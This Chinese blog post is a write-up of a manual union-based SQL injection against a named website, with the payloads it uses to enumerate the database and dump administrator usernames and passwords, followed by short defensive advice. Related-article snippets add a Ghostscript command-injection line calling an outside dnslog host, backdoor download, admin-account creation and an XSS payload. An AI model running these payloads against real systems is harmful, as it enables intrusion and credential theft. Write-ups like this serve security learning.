记一次简单的渗透实战(手工SQL注入)

最新推荐文章于 2024-08-01 20:47:16 发布
最新推荐文章于 2024-08-01 20:47:16 发布
阅读量1.7k 收藏 21
点赞数 4
分类专栏: 渗透思路 网络安全 文章标签: 安全 sql 数据库 网络 经验分享
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_40467699/article/details/108652136
版权

渗透场景:

本次测试网站 :www.gaoneng.com
该漏洞已经提交漏洞盒子平台,已授权公开此漏洞
经过初步判断,得出此网站操作系统为Windows,网站源码脚本格式为php,使用的数据库类型为Mysql,架设环境为Windows Microsoft-IIS/6.0。

问题描述:

产生SQL注入的必备条件:
    1.程序员未经检查或者未经充分检查的用户输入数据,意外变成了代码被执行。
    2.有可利用控制输入的数据值

SQL注入漏洞的危害:
    1.攻击者可以利用获得的数据进行读取服务器敏感文件
    2.植入webshell后门
    3.获取服务器权限等

渗透过程:



①首先找到含有注入点的URL界面
http://www.gaoneng.com/newsshow.php?id=234
1
2
通过简单测试后发现所有新闻页面均存在数据库异常回显状况(注入点),可以判定此URL未过滤注入关键词并含有注入漏洞。


②查询字段长度,爆出字段位置
1)通过order by语句二分法定位字段长度
2)根据回显正常/错误界面判断出共有26个字段
3)在错误界面爆出字段位置
and 1=2 union select 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26
3


③查询当前用户权限与数据库

and 1=2 union select 1,2,3,4,5,6,database(),8,9,10,11,12,13,14,15,16,user(),18,19,20,21,22,23,24,25,26
在数据回显点插入语句查询相关数据库名等信息。
4
//得出当前用户权限为:root
//数据库名为:gaoneng


④查询表名与列名
and 1=2 union select 1,2,3,4,5,6,table_name,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26 from information_schema.tables where table_schema=‘gaoneng’ limit 0,1
5
//因为数据库中不止有一个表名,所以加limit语句进行查询,可以limit X,1逐个查询表名。
//得出表名为 com_admin

and 1=2 union select 1,2,3,4,5,6,column_name,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26 from information_schema.columns where table_name=‘com_admin’ limit 1,1
6
7
//列名也不止一个,所以经过查询得出两个有价值的列名字段
//username,password

⑤查询字段中数据

and 1=2 union select 1,2,3,4,5,6,username,8,9,10,11,12,13,14,15,16,password,18,19,20,21,22,23,24,25,26 from ‘com_admin’
8
//得出管理员用户和密码

解决方案:

本次SQL注入主要是利用了联合查询,通过数据库语句进行一步步猜解和分析,最终得出攻击者需要的密码口令。

如何防范SQL注入攻击?(以下为个人见解,欢迎讨论)

①管理员限制数据库功能,将使用权、用户功能、权限降至最低。
②及时更新数据库补丁,加固安全措施(web防护软件、防火墙),过滤敏感字段。
③避免向用户回显数据库错误信息。
④多层加密数据库密码信息,即使攻击者获得口令也无法破解。

我就是卧底
关注
专栏目录
【愚公系列】2023年05月 Web渗透测试之SQL注入sqli-labs、Less-1)
时光隧道
07-14 5万+
SQL注入是一种常见的攻击方式,它利用应用程序未对用户输入的数据进行正确的过滤和验证,以达到访问或篡改系统数据的目的。具体来说,攻击者可以在注入点上构造恶意的SQL语句,并成功提交给数据库执行,从而造成数据泄露、篡改或者破坏。SQL注入攻击的应用场景非常广泛,常见于Web应用、数据库应用或其他需要使用SQL语句进行数据操作的应用中。order by -- + 判断字段数目union select -- + 联合查询收集信息。
渗透测试-渗透测试常见的总结
lza20001103的博客
05-18 4635
渗透测试常见的总结
渗透测试】---- 一次简单的域渗透
qq_43168364的博客
08-22 349
一、实验机器 域控主机:win2008R2(192.168.15.142) 域客户机:win7(192.168.15.143) 攻击机:kali(192.168.15.129) 二、实验步骤 主机发现,找到域客户机,命令:nmap -sn 192.168.15.0/24 域客户机IP为192.168.15.143,对其进行端口扫描,命令:masscan --rate=10000 --ports 0-65535 192.168.15.143 ...
SQL注入方法大全(非常详细)零基础入门到精通,收藏这一篇就够了
最新发布
Javachichi的博客
08-01 1740
SQL注入方法小百科某一个数据库的名字,这个数据库十分的特殊,里面存放着,大量的隐私信息information_schema数据库中的一个表schemata表中的一个字段(列),这个字段中录着所有数据库的名称information_schema数据库中的一个表tables表中的一个字段(对应数据库的名字),这个字段里面录着所有的数据库的名字tables表中的一个字段(相应数据库中所对应的表名),录着与table_schema这个字段对应的数据库中对应的表名。
SQL注入案例曝光,请大家提高警惕
di91399的博客
07-28 135
近日公司网站发现有无聊人进行SQL注入攻击,在这里曝曝光,在鄙视那些"无聊之人无聊之举"的同时,望大家提高安全意识。 日志录内容是这样的Url:/(x(1)a(eq2io1uyygekaaaanwqxmge4ywytzwy5yi00ytbjlwjlmdatotllmtlmodaym2m5lcndikok9dche5rd2s_rxyhp43i1))/production/prodeta...
一次简单常规渗透
yiiiing的博客
08-28 273
#0x01 前言 公司给了一大堆资产,每周要交一个高危,最好是shell #0x02 开始 打开网站,php的 习惯性加一个admin,得到后台,想着如果找到注入就能拿到账号 接下来就是漫长的逛网站时间,终于还是在一个详情页面被我发现一个注入 #0x03 登录后台 拿到账号密码 md5解密 进入后台,他这里是一个phpcms,先找找漏洞,不行再去看看源码 而且这里可以直接修改后缀,只要有上传功能就能拿shell #0x03 getshell 发现一处上传图片的地方 php无法上传,但是通过在
一次简单渗透测试
qq_45088344的博客
05-21 315
实验环境:kali,centos8 1.确认靶机 因为是在同一网段下测试的,所以可以直接看本机的ip来缩小靶机的搜索范围 确定了靶机ip范围就可以用nmap搜索 在同一网段下nmap发送arp包来测试存活主机 还能用fping发送icmp包来进行三层测试 nmap -sn 192.168.5.0/24 fping -g 192.168.5.0/24 -s -a 其中192.168.5.133是本机地址,范围就缩小到两个地址,对两个地址再用nmap扫描以确定目标靶机 nm...
一次模拟渗透
0verWatch的博客
07-25 584
前言 今天还模拟了一次真实的挖洞过程,今天这网站一共有三个漏洞(都是要经过提醒才能弄出来),因为是搭的环境,简单录一下思路,顺便当个回顾,源码啥的都没有了,耍完就要求删掉了。 正文 这台服务器有个前提就是跟我们一个网段的服务器,并且开了IIS服务,但是前提我们是不知道他的ip的,这个时候我们需要用一下nmap来扫一下同一网段下的ip nmap -sP -PI -PT 192.16...
一次我的漏洞挖掘实战——某公司的SQL注入漏洞
PICACHU+++的博客
05-02 5047
我是在漏洞盒子上提交的漏洞,上面有一个项目叫做公益SRC。公益src是一个白帽子提交随机发现的漏洞的品台,我们可以把我们随机发现或者是主动寻找到的漏洞在漏洞盒子进行提交。在挖掘src的时候不能越红线,一般情况下遇到SQL注入 只获取数据库名字以证明漏洞的存在即可,最好不要再往下获取。而xss漏洞 ,只获取自己的cookie或ip等信息以证明漏洞存在。遇到信息泄露时,如果存在可以下载敏感文件的情况那么在漏洞确认后一定要将文件删除。SQL注入的防御方法很多,也是老生常谈的问题。
SQL手工注入完全篇
09-08
三、SQL注入实战示例 以经典的登录页面为例,如果输入的用户名和密码没有被正确处理,比如: ```sql SELECT * FROM users WHERE username='$username' AND password='$password' ``` 攻击者可以通过输入`' OR '1'='1...
[网络安全提高篇] 一〇六.SQL注入手工注入和SQLMAP入门案例详解
热门推荐
杨秀璋的专栏
03-26 1万+
前文带领大家Oracle数据库注入漏洞和致命问题,包括各种类型的注入知识。这篇文章将详细介绍SQL注入知识,结合案例对比手工SQL注入SQLMAP的基本用法,案例和基础原理的结合能加深大家对SQL注入的理解。希望这篇文章对您有帮助,更希望帮助更多安全或红蓝对抗的初学者,也推荐大家去使用Cyberbit Range的靶场,且看且珍惜。
渗透测试——SQL注入
zjdda的博客
05-19 765
sql注入原理及实战
渗透SQL注入
Jian Sun_的博客
05-17 828
SQL注入攻击 所谓SQL注入,就是通过把SQL命令插入到Web表单提交或输入域名或页面请求的查询字符串,最终达到欺骗服务器执行恶意的SQL命令。具体来说,它是利用现有应用程序,将(恶意的)SQL命令注入到后台数据库引擎执行的能力,它可以通过在Web表单中输入(恶意)SQL语句得到一个存在安全漏洞的网站上的数据库,而不是按照设计者意图去执行SQL语句。比如先前的很多影视网站泄露VIP会员密码大多就是通过WEB表单递交查询字符暴出的,这类表单特别容易受到SQL注入式攻击. 注:来源于百度百科 SQL的危害及
一次常规的渗透测试
我想做一个好人<svg/onload=Alert`1`>(
06-01 428
首先是魔图漏洞 %!PS userdict /setpagedevice undef save legal { null restore } stopped { pop } if { legal } stopped { pop } if restore mark /OutputFile (%pipe%curl http://dnslog.cn/`whomai`) currentdevice putdeviceprops 然后windows下载后门。 方法1:certutil.exe -urlca
SQL注入——渗透day06
qq_62716256的博客
08-12 1007
SQL注入——渗透day06
一次真实渗透经历
qq_39682037的博客
05-23 3976
背景小编就不多解释了,小编在某站点扫描时,发现其可能存在上传漏洞 小编想上传一句话木马,但是发现该站点对文件后缀进行了过滤,故采用burpsuite抓包实现一句话木马文件上传 成功上传之后,利用一句话木马进行连接 利用菜刀工具的cmd创建用户添加管理员组,打开3389端口允许远程连接。 例: net user test test /add net localgroup administrators test /add REG ADD HKLM\SYSTEM\CurrentControlSet\Con
一次网站渗透测试
qq_38348692的博客
10-02 1138
在这里把测试站点都127.0.0.1: 1.进行收集: 1)端口信息扫描,没有太大的利用价值 2)发现网站后台:127.0.0.1/admin/login.php 使用万能密钥成功登陆网站后台 2.尝试上传一句话获取网站webshell 文件上传页面进行上传是发现进行了过滤,不能上传php文件,尝试使用burp绕过,发现进行后台验证,不甘心!!!!! 3. 在后台随便翻找,发现一处文件下载...
一次网站的渗透测试
Hacker_DB的博客
04-14 857
朋友叫我帮忙,对一个网站做一下测试。主要目标是看看能不能进入服务器,收集一些建站者信息。 朋友平时待我不薄,此时怎可出言拒绝?经过授权后,直接开搞! (情景发生时间距今较久,请各位读者酌情参考) 用扫描器扫了一下,没有发现漏洞。发现网站存在CDN: 看了下历史解析录,还好不多。通过判断,确定最后一条为真实IP: 查看下IP绑定的网站,查到3个域名,其中一个无法访问,另一个是个后台: 我们先来看这个后台: 随便输入一个账号和密码,提示数据不存在: 扫了下目录,只扫出个upl
手工SQL注入实战技巧与常用语句解析
"手工SQL注入常用SQL语句" 在网络安全领域,SQL注入是一种常见的攻击手段,主要用于利用不安全的Web应用程序。当攻击者能够通过输入框等交互方式将恶意SQL语句插入到查询中,他们可能能获取敏感数据、修改数据库...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

我就是卧底

若有帮助,欢迎支持!

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值